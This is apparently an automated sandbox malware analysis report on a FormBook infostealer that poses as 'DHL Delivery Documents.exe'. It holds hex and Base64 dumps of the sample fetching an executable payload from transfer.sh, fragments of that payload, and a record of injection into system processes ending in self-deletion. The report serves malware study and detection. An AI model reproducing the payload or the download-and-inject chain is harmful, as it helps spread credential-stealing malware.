                        Data Ascii: PlZJB3MuGJoTPBCkVqTXftogxUs0RuthX3gY5go+tkaewZ/PHQbCvGYNWw7z3+eXCoz0cqrKejyG0A9H6G1y0+PQDpNvKWwXR2ReITwWdf8Kb61qoR4Nkd2rrYpiuyLsdrRsBl/3lded7VQH4CIZqqzJWFzIcXdtXrC9TKacFArFtrzIKzns1LJbcrRQgIayPPqSv4PD/8i49+AmZJ9eHKtj7zcag4Rrpi0Wd3YcG/2/kwGb99fmTrJO+UB+BrR
                        2022-01-28 13:03:29 UTC176INData Raw: 61 72 30 6b 4d 6e 52 6d 37 5a 31 62 39 45 41 78 44 5a 49 4d 6b 68 78 51 64 57 62 58 55 6e 4f 4f 79 76 69 4c 42 75 73 5a 44 57 52 58 30 58 6b 6e 38 42 4f 68 4c 46 77 70 36 34 6a 48 39 64 43 4c 38 4f 58 67 75 6b 4c 42 6e 4f 76 75 32 51 59 78 33 6e 32 33 51 36 61 4c 56 43 7a 42 78 71 43 35 4f 68 62 79 30 36 45 46 43 72 36 72 64 42 50 32 31 71 48 63 34 38 4d 6f 31 7a 34 52 73 49 36 32 34 51 53 33 6a 77 4e 65 36 54 68 39 49 64 6b 4f 5a 72 63 70 2f 58 42 57 59 4b 38 76 48 7a 70 54 4c 67 59 70 6a 50 45 71 67 66 73 31 45 38 74 69 77 4f 74 62 72 61 4c 2b 67 53 4e 30 68 41 68 62 47 71 6f 6e 56 69 36 78 71 53 39 2f 57 41 37 36 30 76 67 4e 68 36 31 35 4b 6a 36 33 77 35 77 4f 61 63 53 49 46 6b 36 55 57 32 45 4a 77 45 79 67 35 2f 33 64 55 63 42 65 68 64 46 6d 54 73 49
                        Data Ascii: ar0kMnRm7Z1b9EAxDZIMkhxQdWbXUnOOyviLBusZDWRX0Xkn8BOhLFwp64jH9dCL8OXgukLBnOvu2QYx3n23Q6aLVCzBxqC5Ohby06EFCr6rdBP21qHc48Mo1z4RsI624QS3jwNe6Th9IdkOZrcp/XBWYK8vHzpTLgYpjPEqgfs1E8tiwOtbraL+gSN0hAhbGqonVi6xqS9/WA760vgNh615Kj63w5wOacSIFk6UW2EJwEyg5/3dUcBehdFmTsI
                        2022-01-28 13:03:29 UTC192INData Raw: 44 36 68 6f 67 6a 49 79 4e 63 53 74 65 38 33 35 4f 5a 73 56 31 77 74 43 67 75 6c 62 44 5a 49 41 72 78 37 38 45 79 4b 66 31 4c 67 64 69 43 47 4b 31 68 6e 4b 4b 67 65 68 36 74 69 70 77 32 72 62 4f 79 48 65 6d 71 4b 55 58 59 45 58 5a 31 30 4e 71 69 6e 44 37 79 35 4c 59 78 38 38 71 6b 62 70 4b 63 2b 41 46 6c 6f 48 52 36 4e 52 31 39 69 44 53 72 70 6f 4c 4a 74 63 4e 51 69 48 4b 2b 34 53 55 58 75 46 66 4d 4e 48 6d 6d 73 73 4e 6c 37 58 39 51 65 53 77 48 50 4f 64 34 77 35 32 65 53 65 68 56 48 74 36 62 7a 76 34 55 50 71 66 51 58 42 35 4f 58 52 4a 33 52 47 38 7a 37 5a 32 32 56 52 32 62 4c 47 6c 65 2f 44 47 69 45 45 45 6a 37 41 71 6a 4f 48 66 66 55 33 44 67 33 7a 2f 52 6e 35 4b 74 35 30 49 45 6e 45 4d 63 70 57 74 71 6a 50 39 77 53 30 57 61 6b 59 41 5a 52 5a 54 6d 5a
                        Data Ascii: D6hogjIyNcSte835OZsV1wtCgulbDZIArx78EyKf1LgdiCGK1hnKKgeh6tipw2rbOyHemqKUXYEXZ10NqinD7y5LYx88qkbpKc+AFloHR6NR19iDSrpoLJtcNQiHK+4SUXuFfMNHmmssNl7X9QeSwHPOd4w52eSehVHt6bzv4UPqfQXB5OXRJ3RG8z7Z22VR2bLGle/DGiEEEj7AqjOHffU3Dg3z/Rn5Kt50IEnEMcpWtqjP9wS0WakYAZRZTmZ
                        2022-01-28 13:03:29 UTC208INData Raw: 56 4d 39 6c 67 37 66 6a 64 7a 63 43 58 44 37 49 61 68 70 46 39 51 57 4a 6b 43 6b 6e 45 32 62 69 2f 59 47 35 38 77 4a 42 7a 69 64 2f 4b 4c 54 62 52 46 45 4f 64 75 72 47 5a 4e 52 35 6b 62 37 4b 31 49 4e 38 59 69 48 4a 4d 5a 39 52 72 36 4f 51 36 41 6b 4d 66 65 57 37 4d 4c 74 4b 78 69 57 4f 77 6b 66 68 53 73 39 4f 37 2b 66 4b 6d 6c 4e 56 59 37 47 44 66 55 74 44 35 4f 64 73 69 31 6b 71 62 7a 77 4d 50 76 2f 6f 47 66 41 61 64 70 79 6f 67 50 49 6b 4d 4f 4f 69 6c 4b 32 4b 50 68 72 75 49 66 35 31 44 4d 46 65 43 33 41 6d 58 75 7a 55 61 68 42 36 41 34 67 6a 4c 4b 50 76 30 45 44 6c 50 67 2b 57 77 7a 2b 69 35 35 6c 5a 72 75 66 30 73 66 62 70 64 52 48 4d 77 43 4b 4c 61 45 42 39 4a 56 2b 50 79 38 6f 36 44 35 56 78 57 6b 4d 74 59 47 62 34 55 41 67 6e 52 78 38 4c 69 68 4c
                        Data Ascii: VM9lg7fjdzcCXD7IahpF9QWJkCknE2bi/YG58wJBzid/KLTbRFEOdurGZNR5kb7K1IN8YiHJMZ9Rr6OQ6AkMfeW7MLtKxiWOwkfhSs9O7+fKmlNVY7GDfUtD5Odsi1kqbzwMPv/oGfAadpyogPIkMOOilK2KPhruIf51DMFeC3AmXuzUahB6A4gjLKPv0EDlPg+Wwz+i55lZruf0sfbpdRHMwCKLaEB9JV+Py8o6D5VxWkMtYGb4UAgnRx8LihL


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.349752144.76.136.153443C:\Users\user\Desktop\DHL Delivery Documents.exe
                        TimestampkBytes transferredDirectionData
                        2022-01-28 13:03:29 UTC218OUTGET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1
                        Host: transfer.sh
                        2022-01-28 13:03:29 UTC218INHTTP/1.1 200 OK
                        Server: nginx/1.14.2
                        Date: Fri, 28 Jan 2022 13:03:29 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 53932
                        Connection: close
                        Content-Disposition: attachment; filename="bbbbbbbbbbb.txt"
                        Retry-After: Fri, 28 Jan 2022 14:03:32 GMT
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 8
                        X-Ratelimit-Reset: 1643375012
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        2022-01-28 13:03:29 UTC219INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 45 65 38 32 45 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 41 4c 41 56 41 41 41 4a 59 41 41 41 43 61 41 41 41 41 41 41 41 41 55 72 55 41 41 41 41 67 41 41 41 41 77 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAEe82EAAAAAAAAAAOAALiALAVAAAJYAAACaAAAAAAAAUrUAAAAgAAAAwAAAAABAAAAgAAAAAgA
                        2022-01-28 13:03:29 UTC234INData Raw: 6a 67 41 41 42 68 51 71 63 75 55 42 41 48 41 53 41 53 6a 61 41 41 41 4b 6a 46 4d 41 41 41 45 6f 36 67 41 41 43 6e 50 72 41 41 41 4b 65 67 41 44 4d 41 6b 41 44 77 41 41 41 41 41 41 41 41 41 43 4a 58 74 48 41 41 41 45 41 31 68 39 52 77 41 41 42 43 6f 41 45 7a 41 46 41 42 6b 41 41 41 41 55 41 41 41 52 41 6e 74 49 41 41 41 45 41 69 56 37 52 77 41 41 42 43 55 4b 46 31 68 39 52 77 41 41 42 41 61 52 4b 67 41 41 41 42 4d 77 42 41 41 6b 41 41 41 41 46 41 41 41 45 51 4a 37 52 77 41 41 42 41 6f 43 4a 58 74 48 41 41 41 45 47 6c 68 39 52 77 41 41 42 41 4a 37 53 41 41 41 42 41 59 6f 55 51 41 41 43 69 55 6d 4b 67 4d 77 42 51 42 4e 41 41 41 41 41 41 41 41 41 41 4a 37 53 41 41 41 42 41 51 6c 46 31 6a 2b 43 77 49 41 41 39 4b 63 41 6e 74 49 41 41 41 45 42 43 55 58 57 50 34
                        Data Ascii: jgAABhQqcuUBAHASASjaAAAKjFMAAAEo6gAACnPrAAAKegADMAkADwAAAAAAAAACJXtHAAAEA1h9RwAABCoAEzAFABkAAAAUAAARAntIAAAEAiV7RwAABCUKF1h9RwAABAaRKgAAABMwBAAkAAAAFAAAEQJ7RwAABAoCJXtHAAAEGlh9RwAABAJ7SAAABAYoUQAACiUmKgMwBQBNAAAAAAAAAAJ7SAAABAQlF1j+CwIAA9KcAntIAAAEBCUXWP4
                        2022-01-28 13:03:29 UTC250INData Raw: 64 58 52 6c 41 46 42 79 62 32 4e 6c 63 33 4d 41 55 48 4a 76 59 32 56 7a 63 30 31 76 5a 48 56 73 5a 51 42 51 63 6d 39 6a 5a 58 4e 7a 54 57 39 6b 64 57 78 6c 51 32 39 73 62 47 56 6a 64 47 6c 76 62 67 42 51 62 32 6c 75 64 41 42 54 61 58 70 6c 41 46 4e 70 65 6d 56 47 41 45 56 34 59 32 56 77 64 47 6c 76 62 67 42 44 64 57 78 30 64 58 4a 6c 53 57 35 6d 62 77 42 54 65 58 4e 30 5a 57 30 75 52 32 78 76 59 6d 46 73 61 58 70 68 64 47 6c 76 62 67 42 4f 64 57 31 69 5a 58 4a 54 64 48 6c 73 5a 58 4d 41 53 55 46 7a 65 57 35 6a 55 6d 56 7a 64 57 78 30 41 45 6c 45 61 58 4e 77 62 33 4e 68 59 6d 78 6c 41 45 6c 75 64 44 45 32 41 45 6c 75 64 44 4d 79 41 45 6c 75 64 44 59 30 41 45 6c 75 64 46 42 30 63 67 42 43 61 57 35 68 63 6e 6c 53 5a 57 46 6b 5a 58 49 41 55 33 6c 7a 64 47 56
                        Data Ascii: dXRlAFByb2Nlc3MAUHJvY2Vzc01vZHVsZQBQcm9jZXNzTW9kdWxlQ29sbGVjdGlvbgBQb2ludABTaXplAFNpemVGAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBTeXN0ZW0uR2xvYmFsaXphdGlvbgBOdW1iZXJTdHlsZXMASUFzeW5jUmVzdWx0AElEaXNwb3NhYmxlAEludDE2AEludDMyAEludDY0AEludFB0cgBCaW5hcnlSZWFkZXIAU3lzdGV
                        2022-01-28 13:03:29 UTC266INData Raw: 41 41 41 41 41 41 59 67 41 51 45 52 67 4a 30 70 41 51 41 6b 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 41 41 41 58 41 51 41 53 51 32 39 77 65 58 4a 70 5a 32 68 30 49 4d 4b 70 49 43 41 79 4d 44 49 78 41 41 41 70 41 51 41 6b 5a 6a 5a 6d 4e 6a 6b 33 4e 7a 59 74 59 54 51 31 4d 53 30 30 5a 44 55 30 4c 54 6b 78 4d 6a 67 74 4e 44 64 6b 5a 6d 59 77 4e 44 4d 79 5a 6d 4d 33 41 41 41 4d 41 51 41 48 4d 53 34 77 4c 6a 41 75 4d 41 41 41 52 77 45 41 47 69 35 4f 52 56 52 47 63 6d 46 74 5a 58 64 76 63 6d 73 73 56 6d 56 79 63 32 6c 76 62 6a 31 32 4e 43 34 77 41 51 42 55 44 68 52 47 63 6d 46 74 5a 58 64 76 63 6d 74 45 61 58 4e 77 62 47 46 35 54 6d 46 74 5a 52 41 75 54 6b 56
                        Data Ascii: AAAAAAYgAQERgJ0pAQAk6buR6a2U546L6buR6a2U546L6buR6a2U546L6buR6a2U546LAAAXAQASQ29weXJpZ2h0IMKpICAyMDIxAAApAQAkZjZmNjk3NzYtYTQ1MS00ZDU0LTkxMjgtNDdkZmYwNDMyZmM3AAAMAQAHMS4wLjAuMAAARwEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC4wAQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRAuTkV


                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:2
                        Start time:14:03:26
                        Start date:28/01/2022
                        Path:C:\Users\user\Desktop\DHL Delivery Documents.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\DHL Delivery Documents.exe"
                        Imagebase:0xad0000
                        File size:48640 bytes
                        MD5 hash:5BC8492C9F262D1F9840635B87EDF9C5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Target ID:7
                        Start time:14:03:31
                        Start date:28/01/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Imagebase:0x970000
                        File size:55400 bytes
                        MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        General

                        Target ID:8
                        Start time:14:03:34
                        Start date:28/01/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff720ea0000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:12
                        Start time:14:03:56
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\msdt.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\msdt.exe
                        Imagebase:0xeb0000
                        File size:1508352 bytes
                        MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        General

                        Target ID:13
                        Start time:14:04:02
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Imagebase:0xd80000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:14
                        Start time:14:04:03
                        Start date:28/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        No disassembly